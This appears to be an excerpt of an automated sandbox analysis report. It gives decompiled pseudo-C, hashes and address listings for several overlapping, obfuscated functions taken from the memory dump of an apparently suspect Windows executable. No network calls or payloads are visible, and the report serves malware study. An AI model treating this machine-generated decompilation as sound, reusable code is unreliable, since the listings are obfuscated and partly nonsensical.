              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8733ba4a355e6db03d0f48299abb24745a856322706511f728a24ef6ab87c0a5
              • Instruction ID: 5727807365af5b533eb2960dd74d83acd188cd47fd534299edba30eea68514f7
              • Opcode Fuzzy Hash: 8733ba4a355e6db03d0f48299abb24745a856322706511f728a24ef6ab87c0a5
              • Instruction Fuzzy Hash: C0219930614505EAEA216E518F0ED7D3375EB50344B644077E902B91E6DEFD9E02AA1F
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 54%
              			E00402AA1(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
              				intOrPtr _t13;
              				intOrPtr* _t16;
              				void* _t17;
              				void* _t18;
              				void* _t20;
              				void* _t23;
              				void* _t26;
              				void* _t27;
              				void* _t28;
              				void* _t29;
              				void* _t32;
              				intOrPtr* _t34;
              
              				_t37 = __eflags;
              				_t31 = __esi;
              				_t30 = __edi;
              				_t23 = __ebx;
              				_push(0x2ace);
              				_t13 =  *_t34;
              				_t26 = 0xa8;
              				L0040113B(_t13, __ebx, _t26, __edi, __esi, __eflags);
              				_push( *((intOrPtr*)(_t32 - 4)));
              				L004018AF(_t29, __esi, __eflags);
              				_t2 = _t23 + 0x2f1d; // 0x2fd0
              				_t16 = _t2;
              				asm("das");
              				 *_t16 =  *_t16 + _t16;
              				_push(_t16);
              				_push( *((intOrPtr*)(_t32 - 4)));
              				_t17 = L004024AC(__ebx, _t30, __esi, _t37); // executed
              				_t38 = _t17;
              				if(_t17 != 0) {
              					_t18 = L00401E02(_t29, _t30, _t38, __fp0,  *((intOrPtr*)(_t32 - 4)));
              					_t39 = _t18;
              					if(_t18 != 0) {
              						L11:
              						_t43 = gs;
              						if(gs != 0) {
              							_t20 = _t23 + 0x51f2;
              							_t27 = 0x2dfd;
              						} else {
              							_t8 = _t23 + 0x2f5d; // 0x3010
              							_t20 = _t8;
              							_t27 = 0x2295;
              						}
              						_push( *((intOrPtr*)(_t23 + 0x7fef)));
              						_push(_t27);
              						_push(_t20);
              						_push( *((intOrPtr*)(_t32 - 4)));
              						L00401813(_t29, _t31, _t43);
              						asm("cmc");
              						 *0x2ace =  *0x2ace + 0x2ace;
              						_t28 = 0xa8;
              						_t17 = L0040113B(0x2ace, _t23, _t28, _t30, _t31, 0);
              					} else {
              						_t17 = L00402114(_t29, _t39,  *((intOrPtr*)(_t32 - 4)));
              						_t40 = _t17;
              						if(_t17 != 0) {
              							_push( *((intOrPtr*)(_t32 - 4)));
              							_t17 = L004021E4(_t29, _t40, __fp0);
              							_t41 = _t17;
              							if(_t17 != 0) {
              								_push( *((intOrPtr*)(_t32 - 4)));
              								_t17 = L00401EB1(_t26, _t41);
              								if(_t17 != 0) {
              									goto L11;
              								}
              							}
              						}
              					}
              				}
              				return _t17;
              			}

              0x00402aa1
              0x00402aa1
              0x00402aa1
              0x00402aa1
              0x00402aa5
              0x00402aaa
              0x00402ac1
              0x00402ac9
              0x00402ace
              0x00402ad1
              0x00402ad6
              0x00402ad6
              0x00402ad9
              0x00402ada
              0x00402adc
              0x00402add
              0x00402ae0
              0x00402ae5
              0x00402ae7
              0x00402af0
              0x00402af5
              0x00402af7
              0x00402b1d
              0x00402b20
              0x00402b23
              0x00402b32
              0x00402b38
              0x00402b25
              0x00402b25
              0x00402b25
              0x00402b2b
              0x00402b30
              0x00402b3d
              0x00402b43
              0x00402b44
              0x00402b45
              0x00402b48
              0x00402b5c
              0x00402b67
              0x00402b69
              0x00402b71
              0x00402af9
              0x00402afc
              0x00402b01
              0x00402b03
              0x00402b05
              0x00402b08
              0x00402b0d
              0x00402b0f
              0x00402b11
              0x00402b14
              0x00402b1b
              0x00000000
              0x00000000
              0x00402b1b
              0x00402b0f
              0x00402b03
              0x00402af7
              0x00402b77

              Memory Dump Source
              • Source File: 00000006.00000002.884693139.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9b81f6e9d0023ef269c51617abf66fd20542672f5f2a610cf8e9df85c1a83b53
              • Instruction ID: 47fc198d5207412bcb5b3d3e41bd7e60512a2df0e8119861439cca51f741cef0
              • Opcode Fuzzy Hash: 9b81f6e9d0023ef269c51617abf66fd20542672f5f2a610cf8e9df85c1a83b53
              • Instruction Fuzzy Hash: 25118A20608106EADF217E51CF0ED7E37795F50344F644077A902791E6DBBDAE12662F
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 50%
              			E00402AB2(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
              				intOrPtr _t13;
              				intOrPtr* _t16;
              				void* _t17;
              				void* _t18;
              				void* _t20;
              				void* _t23;
              				void* _t24;
              				void* _t25;
              				void* _t26;
              				void* _t27;
              				void* _t30;
              				intOrPtr* _t32;
              
              				_t35 = __eflags;
              				_t29 = __esi;
              				_t28 = __edi;
              				_t23 = __ebx;
              				asm("int1");
              				asm("sbb al, 0xeb");
              				_push(0x2ace);
              				_t13 =  *_t32;
              				_t24 = 0xa8;
              				L0040113B(_t13, __ebx, _t24, __edi, __esi, __eflags);
              				_push( *((intOrPtr*)(_t30 - 4)));
              				L004018AF(_t27, __esi, __eflags);
              				_t2 = _t23 + 0x2f1d; // 0x2fd0
              				_t16 = _t2;
              				asm("das");
              				 *_t16 =  *_t16 + _t16;
              				_push(_t16);
              				_push( *((intOrPtr*)(_t30 - 4)));
              				_t17 = L004024AC(__ebx, _t28, __esi, _t35); // executed
              				_t36 = _t17;
              				if(_t17 != 0) {
              					_t18 = L00401E02(_t27, _t28, _t36, __fp0,  *((intOrPtr*)(_t30 - 4)));
              					_t37 = _t18;
              					if(_t18 != 0) {
              						L12:
              						_t41 = gs;
              						if(gs != 0) {
              							_t20 = _t23 + 0x51f2;
              							_t25 = 0x2dfd;
              						} else {
              							_t8 = _t23 + 0x2f5d; // 0x3010
              							_t20 = _t8;
              							_t25 = 0x2295;
              						}
              						_push( *((intOrPtr*)(_t23 + 0x7fef)));
              						_push(_t25);
              						_push(_t20);
              						_push( *((intOrPtr*)(_t30 - 4)));
              						L00401813(_t27, _t29, _t41);
              						asm("cmc");
              						 *0x2ace =  *0x2ace + 0x2ace;
              						_t26 = 0xa8;
              						_t17 = L0040113B(0x2ace, _t23, _t26, _t28, _t29, 0);
              					} else {
              						_t17 = L00402114(_t27, _t37,  *((intOrPtr*)(_t30 - 4)));
              						_t38 = _t17;
              						if(_t17 != 0) {
              							_push( *((intOrPtr*)(_t30 - 4)));
              							_t17 = L004021E4(_t27, _t38, __fp0);
              							_t39 = _t17;
              							if(_t17 != 0) {
              								_push( *((intOrPtr*)(_t30 - 4)));
              								_t17 = L00401EB1(_t24, _t39);
              								if(_t17 != 0) {
              									goto L12;
              								}
              							}
              						}
              					}
              				}
              				return _t17;
              			}

              0x00402ab2
              0x00402ab2
              0x00402ab2
              0x00402ab2
              0x00402ab2
              0x00402ab3
              0x00402aa5
              0x00402aaa
              0x00402ac1
              0x00402ac9
              0x00402ace
              0x00402ad1
              0x00402ad6
              0x00402ad6
              0x00402ad9
              0x00402ada
              0x00402adc
              0x00402add
              0x00402ae0
              0x00402ae5
              0x00402ae7
              0x00402af0
              0x00402af5
              0x00402af7
              0x00402b1d
              0x00402b20
              0x00402b23
              0x00402b32
              0x00402b38
              0x00402b25
              0x00402b25
              0x00402b25
              0x00402b2b
              0x00402b30
              0x00402b3d
              0x00402b43
              0x00402b44
              0x00402b45
              0x00402b48
              0x00402b5c
              0x00402b67
              0x00402b69
              0x00402b71
              0x00402af9
              0x00402afc
              0x00402b01
              0x00402b03
              0x00402b05
              0x00402b08
              0x00402b0d
              0x00402b0f
              0x00402b11
              0x00402b14
              0x00402b1b
              0x00000000
              0x00000000
              0x00402b1b
              0x00402b0f
              0x00402b03
              0x00402af7
              0x00402b77

              Memory Dump Source
              • Source File: 00000006.00000002.884693139.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c423d7b115f8b71c2cdae9f1f93030425c4fd42b98edc1a19394fdce7832392d
              • Instruction ID: b889dc3653f2fefba51467e05df38c533c4bb4e3d2ea1bbc4c1d9987d1b66d31
              • Opcode Fuzzy Hash: c423d7b115f8b71c2cdae9f1f93030425c4fd42b98edc1a19394fdce7832392d
              • Instruction Fuzzy Hash: 08018824608106EADF217E61CF0ED7E37799F50384F604077AD01781E6DEBDAE12652E
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 56%
              			E00402AB9(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
              				void* _t13;
              				void* _t16;
              				intOrPtr* _t19;
              				void* _t20;
              				void* _t22;
              				void* _t23;
              				void* _t24;
              				void* _t25;
              				void* _t26;
              				void* _t29;
              
              				_t32 = __eflags;
              				_t28 = __esi;
              				_t27 = __edi;
              				_t22 = __ebx;
              				asm("in eax, dx");
              				if(__eflags > 0) {
              					L10:
              					goto L12;
              				} else {
              					_t25 = 0xa8;
              					L0040113B(_t13, __ebx, _t25, __edi, __esi, __eflags);
              					_push( *((intOrPtr*)(_t29 - 4)));
              					L004018AF(_t26, __esi, __eflags);
              					_t2 = _t22 + 0x2f1d; // 0x2fd0
              					_t19 = _t2;
              					asm("das");
              					 *_t19 =  *_t19 + _t19;
              					_push(_t19);
              					_push( *((intOrPtr*)(_t29 - 4)));
              					_t16 = L004024AC(__ebx, _t27, __esi, _t32); // executed
              					_t33 = _t16;
              					if(_t16 != 0) {
              						_t20 = L00401E02(_t26, _t27, _t33, __fp0,  *((intOrPtr*)(_t29 - 4)));
              						_t34 = _t20;
              						if(_t20 != 0) {
              							L8:
              							_t38 = gs;
              							if(gs != 0) {
              								_t13 = _t22 + 0x51f2;
              								_t23 = 0x2dfd;
              							} else {
              								_t8 = _t22 + 0x2f5d; // 0x3010
              								_t13 = _t8;
              								_t23 = 0x2295;
              								goto L10;
              							}
              							L12:
              							_push( *((intOrPtr*)(_t22 + 0x7fef)));
              							_push(_t23);
              							_push(_t13);
              							_push( *((intOrPtr*)(_t29 - 4)));
              							L00401813(_t26, _t28, _t38);
              							asm("cmc");
              							 *0x2ace =  *0x2ace + 0x2ace;
              							_t24 = 0xa8;
              							_t16 = L0040113B(0x2ace, _t22, _t24, _t27, _t28, 0);
              						} else {
              							_t16 = L00402114(_t26, _t34,  *((intOrPtr*)(_t29 - 4)));
              							_t35 = _t16;
              							if(_t16 != 0) {
              								_push( *((intOrPtr*)(_t29 - 4)));
              								_t16 = L004021E4(_t26, _t35, __fp0);
              								_t36 = _t16;
              								if(_t16 != 0) {
              									_push( *((intOrPtr*)(_t29 - 4)));
              									_t16 = L00401EB1(_t25, _t36);
              									if(_t16 != 0) {
              										goto L8;
              									}
              								}
              							}
              						}
              					}
              				}
              				return _t16;
              			}

              [Per-line address column of the E00402AB9 listing above, collapsed: instruction addresses run from 0x00402ab9 to 0x00402b77; entries of 0x00000000 belong to listing lines that carry no code address.]

              Memory Dump Source
              • Source File: 00000006.00000002.884693139.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1cb42d9c437a64efe1c207f66a962eec174b878c172efba8ea04643b21c8500f
              • Instruction ID: 4563f9e46d26d0fc6f1af88425e5f71b2a6fa0fd497496786d5f11c7a0aa9524
              • Opcode Fuzzy Hash: 1cb42d9c437a64efe1c207f66a962eec174b878c172efba8ea04643b21c8500f
              • Instruction Fuzzy Hash: DC018E30504406EAEF10BE61CF4ADBE33799F00344F6440B7AD01B91E6EBBCAE01662E
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 51%
              			E00402AC4(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
              				void* _t13;
              				intOrPtr* _t16;
              				void* _t17;
              				void* _t18;
              				void* _t20;
              				void* _t23;
              				void* _t24;
              				void* _t25;
              				void* _t26;
              				void* _t27;
              				void* _t30;
              
              				_t33 = __eflags;
              				_t29 = __esi;
              				_t28 = __edi;
              				_t23 = __ebx;
              				asm("das");
              				asm("aam 0xeb");
              				_t24 = 0xa8;
              				L0040113B(_t13, __ebx, _t24, __edi, __esi, __eflags);
              				_push( *((intOrPtr*)(_t30 - 4)));
              				L004018AF(_t27, __esi, __eflags);
              				_t2 = _t23 + 0x2f1d; // 0x2fd0
              				_t16 = _t2;
              				asm("das");
              				 *_t16 =  *_t16 + _t16;
              				_push(_t16);
              				_push( *((intOrPtr*)(_t30 - 4)));
              				_t17 = L004024AC(__ebx, _t28, __esi, _t33); // executed
              				_t34 = _t17;
              				if(_t17 != 0) {
              					_t18 = L00401E02(_t27, _t28, _t34, __fp0,  *((intOrPtr*)(_t30 - 4)));
              					_t35 = _t18;
              					if(_t18 != 0) {
              						L9:
              						_t39 = gs;
              						if(gs != 0) {
              							_t20 = _t23 + 0x51f2;
              							_t25 = 0x2dfd;
              						} else {
              							_t8 = _t23 + 0x2f5d; // 0x3010
              							_t20 = _t8;
              							_t25 = 0x2295;
              						}
              						_push( *((intOrPtr*)(_t23 + 0x7fef)));
              						_push(_t25);
              						_push(_t20);
              						_push( *((intOrPtr*)(_t30 - 4)));
              						L00401813(_t27, _t29, _t39);
              						asm("cmc");
              						 *0x2ace =  *0x2ace + 0x2ace;
              						_t26 = 0xa8;
              						_t17 = L0040113B(0x2ace, _t23, _t26, _t28, _t29, 0);
              					} else {
              						_t17 = L00402114(_t27, _t35,  *((intOrPtr*)(_t30 - 4)));
              						_t36 = _t17;
              						if(_t17 != 0) {
              							_push( *((intOrPtr*)(_t30 - 4)));
              							_t17 = L004021E4(_t27, _t36, __fp0);
              							_t37 = _t17;
              							if(_t17 != 0) {
              								_push( *((intOrPtr*)(_t30 - 4)));
              								_t17 = L00401EB1(_t24, _t37);
              								if(_t17 != 0) {
              									goto L9;
              								}
              							}
              						}
              					}
              				}
              				return _t17;
              			}

              [Per-line address column of the E00402AC4 listing above, collapsed: instruction addresses run from 0x00402ac4 to 0x00402b77; entries of 0x00000000 belong to listing lines that carry no code address.]

              Memory Dump Source
              • Source File: 00000006.00000002.884693139.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0aeb0d639299cd7c47a6dd3cb2c02bc57c7db770262e0f8f47f16cd0cb76cbc7
              • Instruction ID: 067266aeff685c6259f46f987b077b20ea8ec5c24405308e70dc4b26590eed1d
              • Opcode Fuzzy Hash: 0aeb0d639299cd7c47a6dd3cb2c02bc57c7db770262e0f8f47f16cd0cb76cbc7
              • Instruction Fuzzy Hash: D5015224504106E6DF117F61CF0AD7E37799F00344B504077AD01B81E6DBBDAE12662E
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions